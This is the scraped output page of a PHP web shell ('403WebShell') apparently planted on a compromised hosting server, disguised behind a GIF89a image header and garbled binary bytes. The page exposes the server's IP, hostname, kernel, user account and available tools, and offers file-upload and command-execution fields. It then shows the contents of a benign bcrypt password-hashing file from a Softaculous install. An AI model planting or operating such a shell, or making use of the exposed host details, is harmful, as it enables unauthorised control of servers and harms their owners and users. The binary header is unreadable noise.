GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ý NETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýý m&ýýE8ýSýkGýAýpxýaýýý R2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|s hýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPý ýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbx ýl5}ýpý ýýý ý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~ 6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5 !_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýý ýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp% AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ý ýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`A ý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý 403WebShell
403Webshell
Server IP : 217.18.85.50  /  Your IP : 18.227.13.119
Web Server : LiteSpeed
System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : ferhatgenc ( )
PHP Version : 7.2.34
Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/hotaru/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/softaculous/hotaru/update_pass.php
<?php
/**
 * A Compatibility library with PHP 5.5's simplified password hashing API.
 *
 * @author Anthony Ferrara <ircmaxell@php.net>
 * @license http://www.opensource.org/licenses/mit-license.html MIT License
 * @copyright 2012 The Authors
 */
	define('PASSWORD_BCRYPT', 1);
	define('PASSWORD_DEFAULT', PASSWORD_BCRYPT);
	define('PASSWORD_BCRYPT_DEFAULT_COST', 10);

$resp = __password_hash('[[admin_pass]]', PASSWORD_DEFAULT);
echo '<update_pass>'.$resp.'</update_pass>';


/**
 * Hash the password using the specified algorithm
 *
 * @param string $password The password to hash
 * @param int    $algo     The algorithm to use (Defined by PASSWORD_* constants)
 * @param array  $options  The options for the algorithm to use
 *
 * @return string|false The hashed password, or false on error.
 */
function __password_hash($password, $algo, array $options = array()) {
	global $error;
	if (!function_exists('crypt')) {
		$error[] = "Crypt must be loaded for password_hash to function";
		return null;
	}
	if (is_null($password) || is_int($password)) {
		$password = (string) $password;
	}
	if (!is_string($password)) {
		$error[] = "password_hash(): Password must be a string";
		return null;
	}
	if (!is_int($algo)) {
		$error[] = "password_hash() expects parameter 2 to be long, " . gettype($algo) . " given";
		return null;
	}
	$resultLength = 0;
	switch ($algo) {
		case PASSWORD_BCRYPT:
			$cost = PASSWORD_BCRYPT_DEFAULT_COST;
			if (isset($options['cost'])) {
				$cost = $options['cost'];
				if ($cost < 4 || $cost > 31) {
					$error[] = "password_hash(): Invalid bcrypt cost parameter specified: ".$cost;
					return null;
				}
			}
			// The length of salt to generate
			$raw_salt_len = 16;
			// The length required in the final serialization
			$required_salt_len = 22;
			$hash_format = sprintf("$2y$%02d$", $cost);
			// The expected length of the final crypt() output
			$resultLength = 60;
			break;
		default:
			$error[] = "password_hash(): Unknown password hashing algorithm: %s". $algo;
			return null;
	}
	$salt_requires_encoding = false;
	if (isset($options['salt'])) {
		switch (gettype($options['salt'])) {
			case 'NULL':
			case 'boolean':
			case 'integer':
			case 'double':
			case 'string':
				$salt = (string) $options['salt'];
				break;
			case 'object':
				if (method_exists($options['salt'], '__tostring')) {
					$salt = (string) $options['salt'];
					break;
				}
			case 'array':
			case 'resource':
			default:
				$error[] = 'password_hash(): Non-string salt parameter supplied';
				return null;
		}
		if (__strlen($salt) < $required_salt_len) {
			$error[] = "password_hash(): Provided salt is too short: expecting";
			return null;
		} elseif (0 == preg_match('#^[a-zA-Z0-9./]+$#D', $salt)) {
			$salt_requires_encoding = true;
		}
	} else {
		$buffer = '';
		$buffer_valid = false;
		if (function_exists('mcrypt_create_iv') && !defined('PHALANGER')) {
			$buffer = mcrypt_create_iv($raw_salt_len, MCRYPT_DEV_URANDOM);
			if ($buffer) {
				$buffer_valid = true;
			}
		}
		if (!$buffer_valid && function_exists('openssl_random_pseudo_bytes')) {
			$buffer = openssl_random_pseudo_bytes($raw_salt_len);
			if ($buffer) {
				$buffer_valid = true;
			}
		}
		if (!$buffer_valid && @is_readable('/dev/urandom')) {
			$f = fopen('/dev/urandom', 'r');
			$read = __strlen($buffer);
			while ($read < $raw_salt_len) {
				$buffer .= fread($f, $raw_salt_len - $read);
				$read = __strlen($buffer);
			}
			fclose($f);
			if ($read >= $raw_salt_len) {
				$buffer_valid = true;
			}
		}
		if (!$buffer_valid || __strlen($buffer) < $raw_salt_len) {
			$bl = __strlen($buffer);
			for ($i = 0; $i < $raw_salt_len; $i++) {
				if ($i < $bl) {
					$buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255));
				} else {
					$buffer .= chr(mt_rand(0, 255));
				}
			}
		}
		$salt = $buffer;
		$salt_requires_encoding = true;
	}
	if ($salt_requires_encoding) {
		// encode string with the Base64 variant used by crypt
		$base64_digits =
			'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
		$bcrypt64_digits =
			'./ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

		$base64_string = base64_encode($salt);
		$salt = strtr(rtrim($base64_string, '='), $base64_digits, $bcrypt64_digits);
	}
	$salt = __substr($salt, 0, $required_salt_len);

	$hash = $hash_format . $salt;

	$ret = crypt($password, $hash);

	if (!is_string($ret) || __strlen($ret) != $resultLength) {
		return false;
	}

	return $ret;
}

/**
 * Get a substring based on byte limits
 *
 * @see __strlen()
 *
 * @param string $binary_string The input string
 * @param int    $start
 * @param int    $length
 *
 * @internal
 * @return string The substring
 */
function __substr($binary_string, $start, $length) {
	if (function_exists('mb__substr')) {
		return mb__substr($binary_string, $start, $length, '8bit');
	}
	return substr($binary_string, $start, $length);
}

  /**
 * Count the number of bytes in a string
 *
 * We cannot simply use strlen() for this, because it might be overwritten by the mbstring extension.
 * In this case, strlen() will count the number of *characters* based on the internal encoding. A
 * sequence of bytes might be regarded as a single multibyte character.
 *
 * @param string $binary_string The input string
 *
 * @internal
 * @return int The number of bytes
 */
function __strlen($binary_string) {
	if (function_exists('mb__strlen')) {
		return mb__strlen($binary_string, '8bit');
	}
	return strlen($binary_string);
}

@unlink('update_pass.php');

Youez - 2016 - github.com/yon3zu
LinuXploit